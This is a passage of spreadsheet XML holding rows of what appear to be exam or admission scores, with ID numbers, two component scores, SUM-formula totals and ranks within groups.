      </c>
    </row>
    <row r="264" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A264" s="8" t="n">
        <v>4200055</v>
      </c>
      <c r="B264" s="8" t="n">
        <v>1314010915</v>
      </c>
      <c r="C264" s="8" t="s">
        <v>128</v>
      </c>
      <c r="D264" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E264" s="8" t="n">
        <v>44</v>
      </c>
      <c r="F264" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G264" s="8"/>
      <c r="H264" s="8" t="n">
        <f aca="false">SUM(E264:G264)</f>
        <v>105.4</v>
      </c>
      <c r="I264" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="265" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A265" s="8" t="n">
        <v>4200055</v>
      </c>
      <c r="B265" s="8" t="n">
        <v>1314010917</v>
      </c>
      <c r="C265" s="8" t="s">
        <v>128</v>
      </c>
      <c r="D265" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E265" s="8" t="n">
        <v>36</v>
      </c>
      <c r="F265" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G265" s="8"/>
      <c r="H265" s="8" t="n">
        <f aca="false">SUM(E265:G265)</f>
        <v>95.8</v>
      </c>
      <c r="I265" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="266" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A266" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B266" s="8" t="n">
        <v>1314010919</v>
      </c>
      <c r="C266" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D266" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E266" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F266" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="G266" s="8"/>
      <c r="H266" s="8" t="n">
        <f aca="false">SUM(E266:G266)</f>
        <v>123</v>
      </c>
      <c r="I266" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="267" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A267" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B267" s="8" t="n">
        <v>1314010921</v>
      </c>
      <c r="C267" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D267" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E267" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F267" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G267" s="8"/>
      <c r="H267" s="8" t="n">
        <f aca="false">SUM(E267:G267)</f>
        <v>120.6</v>
      </c>
      <c r="I267" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="268" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A268" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B268" s="8" t="n">
        <v>1314010925</v>
      </c>
      <c r="C268" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D268" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E268" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F268" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G268" s="8"/>
      <c r="H268" s="8" t="n">
        <f aca="false">SUM(E268:G268)</f>
        <v>119.6</v>
      </c>
      <c r="I268" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="269" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A269" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B269" s="8" t="n">
        <v>1314010924</v>
      </c>
      <c r="C269" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D269" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E269" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="F269" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G269" s="8"/>
      <c r="H269" s="8" t="n">
        <f aca="false">SUM(E269:G269)</f>
        <v>99.6</v>
      </c>
      <c r="I269" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="270" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A270" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B270" s="8" t="n">
        <v>1314010923</v>
      </c>
      <c r="C270" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D270" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E270" s="8" t="n">
        <v>39.8</v>
      </c>
      <c r="F270" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G270" s="8"/>
      <c r="H270" s="8" t="n">
        <f aca="false">SUM(E270:G270)</f>
        <v>99</v>
      </c>
      <c r="I270" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="271" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A271" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B271" s="8" t="n">
        <v>1314010918</v>
      </c>
      <c r="C271" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D271" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E271" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="F271" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G271" s="8"/>
      <c r="H271" s="8" t="n">
        <f aca="false">SUM(E271:G271)</f>
        <v>96.4</v>
      </c>
      <c r="I271" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="272" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A272" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B272" s="8" t="n">
        <v>1314010920</v>
      </c>
      <c r="C272" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D272" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E272" s="8" t="n">
        <v>41</v>
      </c>
      <c r="F272" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="G272" s="8"/>
      <c r="H272" s="8" t="n">
        <f aca="false">SUM(E272:G272)</f>
        <v>90.4</v>
      </c>
      <c r="I272" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="273" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A273" s="8" t="n">
        <v>4200056</v>
      </c>
      <c r="B273" s="8" t="n">
        <v>1314010922</v>
      </c>
      <c r="C273" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D273" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E273" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F273" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G273" s="8"/>
      <c r="H273" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I273" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="274" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A274" s="8" t="n">
        <v>4200057</v>
      </c>
      <c r="B274" s="8" t="n">
        <v>1314010928</v>
      </c>
      <c r="C274" s="8" t="s">
        <v>129</v>
      </c>
      <c r="D274" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E274" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F274" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G274" s="8"/>
      <c r="H274" s="8" t="n">
        <f aca="false">SUM(E274:G274)</f>
        <v>111.4</v>
      </c>
      <c r="I274" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="275" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A275" s="8" t="n">
        <v>4200057</v>
      </c>
      <c r="B275" s="8" t="n">
        <v>1314010926</v>
      </c>
      <c r="C275" s="8" t="s">
        <v>129</v>
      </c>
      <c r="D275" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E275" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F275" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="G275" s="8"/>
      <c r="H275" s="8" t="n">
        <f aca="false">SUM(E275:G275)</f>
        <v>111.2</v>
      </c>
      <c r="I275" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="276" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A276" s="8" t="n">
        <v>4200057</v>
      </c>
      <c r="B276" s="8" t="n">
        <v>1314010927</v>
      </c>
      <c r="C276" s="8" t="s">
        <v>129</v>
      </c>
      <c r="D276" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E276" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F276" s="8" t="n">
        <v>45.8</v>
      </c>
      <c r="G276" s="8"/>
      <c r="H276" s="8" t="n">
        <f aca="false">SUM(E276:G276)</f>
        <v>95.4</v>
      </c>
      <c r="I276" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="277" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A277" s="9" t="n">
        <v>4200087</v>
      </c>
      <c r="B277" s="8" t="n">
        <v>1314010929</v>
      </c>
      <c r="C277" s="8" t="s">
        <v>130</v>
      </c>
      <c r="D277" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E277" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F277" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="G277" s="8"/>
      <c r="H277" s="8" t="n">
        <f aca="false">SUM(E277:G277)</f>
        <v>104.4</v>
      </c>
      <c r="I277" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="278" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A278" s="9" t="n">
        <v>4200087</v>
      </c>
      <c r="B278" s="8" t="n">
        <v>1314012507</v>
      </c>
      <c r="C278" s="8" t="s">
        <v>130</v>
      </c>
      <c r="D278" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E278" s="8" t="n">
        <v>46.4</v>
      </c>
      <c r="F278" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G278" s="8"/>
      <c r="H278" s="8" t="n">
        <f aca="false">SUM(E278:G278)</f>
        <v>102.2</v>
      </c>
      <c r="I278" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="279" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A279" s="9" t="n">
        <v>4200087</v>
      </c>
      <c r="B279" s="8" t="n">
        <v>1314010930</v>
      </c>
      <c r="C279" s="8" t="s">
        <v>130</v>
      </c>
      <c r="D279" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E279" s="8" t="n">
        <v>37.6</v>
      </c>
      <c r="F279" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G279" s="8"/>
      <c r="H279" s="8" t="n">
        <f aca="false">SUM(E279:G279)</f>
        <v>100</v>
      </c>
      <c r="I279" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="280" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A280" s="8" t="n">
        <v>4200100</v>
      </c>
      <c r="B280" s="8" t="n">
        <v>1314012508</v>
      </c>
      <c r="C280" s="8" t="s">
        <v>131</v>
      </c>
      <c r="D280" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E280" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="F280" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G280" s="8"/>
      <c r="H280" s="8" t="n">
        <f aca="false">SUM(E280:G280)</f>
        <v>105.6</v>
      </c>
      <c r="I280" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="281" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A281" s="8" t="n">
        <v>4200100</v>
      </c>
      <c r="B281" s="8" t="n">
        <v>1314012510</v>
      </c>
      <c r="C281" s="8" t="s">
        <v>131</v>
      </c>
      <c r="D281" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E281" s="8" t="n">
        <v>36.8</v>
      </c>
      <c r="F281" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="G281" s="8"/>
      <c r="H281" s="8" t="n">
        <f aca="false">SUM(E281:G281)</f>
        <v>83.4</v>
      </c>
      <c r="I281" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="282" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A282" s="8" t="n">
        <v>4200100</v>
      </c>
      <c r="B282" s="8" t="n">
        <v>1314012509</v>
      </c>
      <c r="C282" s="8" t="s">
        <v>131</v>
      </c>
      <c r="D282" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E282" s="8" t="n">
        <v>37</v>
      </c>
      <c r="F282" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G282" s="8"/>
      <c r="H282" s="8" t="n">
        <v>37</v>
      </c>
      <c r="I282" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="283" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A283" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B283" s="8" t="n">
        <v>1314011023</v>
      </c>
      <c r="C283" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D283" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E283" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F283" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G283" s="8"/>
      <c r="H283" s="8" t="n">
        <f aca="false">SUM(E283:G283)</f>
        <v>130.2</v>
      </c>
      <c r="I283" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="284" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A284" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B284" s="8" t="n">
        <v>1314011024</v>
      </c>
      <c r="C284" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D284" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E284" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F284" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="G284" s="8"/>
      <c r="H284" s="8" t="n">
        <f aca="false">SUM(E284:G284)</f>
        <v>129.6</v>
      </c>
      <c r="I284" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="285" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A285" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B285" s="8" t="n">
        <v>1314011025</v>
      </c>
      <c r="C285" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D285" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E285" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F285" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="G285" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H285" s="8" t="n">
        <f aca="false">SUM(E285:G285)</f>
        <v>127</v>
      </c>
      <c r="I285" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="286" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A286" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B286" s="8" t="n">
        <v>1314011022</v>
      </c>
      <c r="C286" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D286" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E286" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F286" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G286" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H286" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I286" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="287" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A287" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B287" s="8" t="n">
        <v>1314011021</v>
      </c>
      <c r="C287" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D287" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E287" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F287" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G287" s="8"/>
      <c r="H287" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I287" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="288" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A288" s="9" t="n">
        <v>4300058</v>
      </c>
      <c r="B288" s="8" t="n">
        <v>1314011026</v>
      </c>
      <c r="C288" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D288" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E288" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F288" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G288" s="8"/>
      <c r="H288" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I288" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="289" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A289" s="9" t="n">
        <v>4300059</v>
      </c>
      <c r="B289" s="8" t="n">
        <v>1314011030</v>
      </c>
      <c r="C289" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D289" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E289" s="8" t="n">
        <v>58</v>
      </c>
      <c r="F289" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G289" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H289" s="8" t="n">
        <f aca="false">SUM(E289:G289)</f>
        <v>128</v>
      </c>
      <c r="I289" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="290" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A290" s="9" t="n">
        <v>4300059</v>
      </c>
      <c r="B290" s="8" t="n">
        <v>1314011028</v>
      </c>
      <c r="C290" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D290" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E290" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="F290" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G290" s="8"/>
      <c r="H290" s="8" t="n">
        <f aca="false">SUM(E290:G290)</f>
        <v>126.4</v>
      </c>
      <c r="I290" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="291" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A291" s="9" t="n">
        <v>4300059</v>
      </c>
      <c r="B291" s="8" t="n">
        <v>1314011027</v>
      </c>
      <c r="C291" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D291" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E291" s="8" t="n">
        <v>56</v>
      </c>
      <c r="F291" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G291" s="8"/>
      <c r="H291" s="8" t="n">
        <f aca="false">SUM(E291:G291)</f>
        <v>119</v>
      </c>
      <c r="I291" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="292" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A292" s="9" t="n">
        <v>4300059</v>
      </c>
      <c r="B292" s="8" t="n">
        <v>1314011029</v>
      </c>
      <c r="C292" s="8" t="s">
        <v>132</v>
      </c>
      <c r="D292" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E292" s="8" t="n">
        <v>44.6</v>
      </c>
      <c r="F292" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="G292" s="8"/>
      <c r="H292" s="8" t="n">
        <f aca="false">SUM(E292:G292)</f>
        <v>114</v>
      </c>
      <c r="I292" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="293" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A293" s="9" t="n">
        <v>4300067</v>
      </c>
      <c r="B293" s="8" t="n">
        <v>1314011102</v>
      </c>
      <c r="C293" s="8" t="s">
        <v>134</v>
      </c>
      <c r="D293" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E293" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F293" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G293" s="8"/>
      <c r="H293" s="8" t="n">
        <f aca="false">SUM(E293:G293)</f>
        <v>121.4</v>
      </c>
      <c r="I293" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="294" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A294" s="9" t="n">
        <v>4300067</v>
      </c>
      <c r="B294" s="8" t="n">
        <v>1314011101</v>
      </c>
      <c r="C294" s="8" t="s">
        <v>134</v>
      </c>
      <c r="D294" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E294" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="F294" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="G294" s="8"/>
      <c r="H294" s="8" t="n">
        <f aca="false">SUM(E294:G294)</f>
        <v>111</v>
      </c>
      <c r="I294" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="295" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A295" s="9" t="n">
        <v>4300067</v>
      </c>
      <c r="B295" s="8" t="n">
        <v>1314011103</v>
      </c>
      <c r="C295" s="8" t="s">
        <v>134</v>
      </c>
      <c r="D295" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E295" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F295" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G295" s="8"/>
      <c r="H295" s="8" t="n">
        <f aca="false">SUM(E295:G295)</f>
        <v>110.2</v>
      </c>
      <c r="I295" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="296" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A296" s="9" t="n">
        <v>4300067</v>
      </c>
      <c r="B296" s="8" t="n">
        <v>1314011104</v>
      </c>
      <c r="C296" s="8" t="s">
        <v>134</v>
      </c>
      <c r="D296" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E296" s="8" t="n">
        <v>37.2</v>
      </c>
      <c r="F296" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G296" s="8"/>
      <c r="H296" s="8" t="n">
        <f aca="false">SUM(E296:G296)</f>
        <v>93</v>
      </c>
      <c r="I296" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="297" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A297" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B297" s="8" t="n">
        <v>1314011106</v>
      </c>
      <c r="C297" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D297" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E297" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="F297" s="8" t="n">
        <v>73.2</v>
      </c>
      <c r="G297" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H297" s="8" t="n">
        <f aca="false">SUM(E297:G297)</f>
        <v>143.6</v>
      </c>
      <c r="I297" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="298" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A298" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B298" s="8" t="n">
        <v>1314011111</v>
      </c>
      <c r="C298" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D298" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E298" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F298" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="G298" s="8"/>
      <c r="H298" s="8" t="n">
        <f aca="false">SUM(E298:G298)</f>
        <v>133.4</v>
      </c>
      <c r="I298" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="299" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A299" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B299" s="8" t="n">
        <v>1314011109</v>
      </c>
      <c r="C299" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D299" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E299" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="F299" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G299" s="8"/>
      <c r="H299" s="8" t="n">
        <f aca="false">SUM(E299:G299)</f>
        <v>131.8</v>
      </c>
      <c r="I299" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="300" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A300" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B300" s="8" t="n">
        <v>1314011107</v>
      </c>
      <c r="C300" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D300" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E300" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F300" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G300" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H300" s="8" t="n">
        <f aca="false">SUM(E300:G300)</f>
        <v>125</v>
      </c>
      <c r="I300" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="301" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A301" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B301" s="8" t="n">
        <v>1314011105</v>
      </c>
      <c r="C301" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D301" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E301" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F301" s="8" t="n">
        <v>68.8</v>
      </c>
      <c r="G301" s="8"/>
      <c r="H301" s="8" t="n">
        <f aca="false">SUM(E301:G301)</f>
        <v>118.4</v>
      </c>
      <c r="I301" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="302" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A302" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B302" s="8" t="n">
        <v>1314011110</v>
      </c>
      <c r="C302" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D302" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E302" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F302" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G302" s="8"/>
      <c r="H302" s="8" t="n">
        <f aca="false">SUM(E302:G302)</f>
        <v>117</v>
      </c>
      <c r="I302" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="303" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A303" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B303" s="8" t="n">
        <v>1314011108</v>
      </c>
      <c r="C303" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D303" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E303" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F303" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G303" s="8"/>
      <c r="H303" s="8" t="n">
        <f aca="false">SUM(E303:G303)</f>
        <v>115.8</v>
      </c>
      <c r="I303" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="304" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A304" s="9" t="n">
        <v>4300069</v>
      </c>
      <c r="B304" s="8" t="n">
        <v>1314011112</v>
      </c>
      <c r="C304" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D304" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E304" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="F304" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G304" s="8"/>
      <c r="H304" s="8" t="n">
        <f aca="false">SUM(E304:G304)</f>
        <v>108</v>
      </c>
      <c r="I304" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="305" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A305" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B305" s="8" t="n">
        <v>1314011116</v>
      </c>
      <c r="C305" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D305" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E305" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="F305" s="8" t="n">
        <v>74</v>
      </c>
      <c r="G305" s="8"/>
      <c r="H305" s="8" t="n">
        <f aca="false">SUM(E305:G305)</f>
        <v>138.4</v>
      </c>
      <c r="I305" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="306" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A306" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B306" s="8" t="n">
        <v>1314011118</v>
      </c>
      <c r="C306" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D306" s="8" t="s">
        <v>133</v>
      </c>
